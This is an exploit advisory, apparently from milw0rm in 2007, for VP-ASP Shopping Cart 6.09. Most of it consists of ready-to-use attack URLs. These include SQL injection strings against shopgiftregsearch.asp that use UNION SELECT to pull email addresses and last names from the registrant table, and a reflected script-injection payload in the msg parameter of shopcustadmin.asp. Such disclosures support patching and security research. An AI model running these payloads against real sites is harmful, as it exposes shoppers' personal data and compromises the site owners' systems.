39 lines
No EOL
1.2 KiB
Text
39 lines
No EOL
1.2 KiB
Text
*******************************************************************************
|
|
# Title : VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities
|
|
# Author : ajann
|
|
# Contact : :(
|
|
# S.Page : http://www.vpasp.com
|
|
# $$ : $49.00 - $350.00 - $495.00
|
|
|
|
*******************************************************************************
|
|
|
|
[[SQL]]]---------------------------------------------------------
|
|
|
|
http://[target]/[path]//shopgiftregsearch.asp?LoginLastname=[SQL]
|
|
|
|
Example:
|
|
|
|
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
|
|
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
|
|
|
|
This Informations go to login page.
|
|
|
|
[[/SQL]]
|
|
|
|
[[XSS]]]---------------------------------------------------------
|
|
|
|
http://[target]/[path]//shopcustadmin.asp?msg=[XSS]
|
|
|
|
Example:
|
|
|
|
//shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E
|
|
|
|
[[/XSS]]
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2007-01-11] |